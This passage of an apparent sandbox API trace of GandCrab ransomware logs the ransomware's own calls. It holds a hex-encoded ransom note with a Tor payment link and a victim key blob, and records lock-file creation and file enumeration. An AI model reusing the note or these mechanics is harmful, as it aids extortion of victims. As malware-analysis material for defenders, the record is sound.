3\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0070.432] CloseHandle (hObject=0x2b4) returned 1 [0070.432] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.432] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.433] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2ea)) [0070.433] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.433] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.433] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.433] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock") returned 72 [0070.433] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0070.434] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.434] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.434] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\") returned 48 [0070.435] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*" [0070.435] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*", fInfoLevelId=0x1, 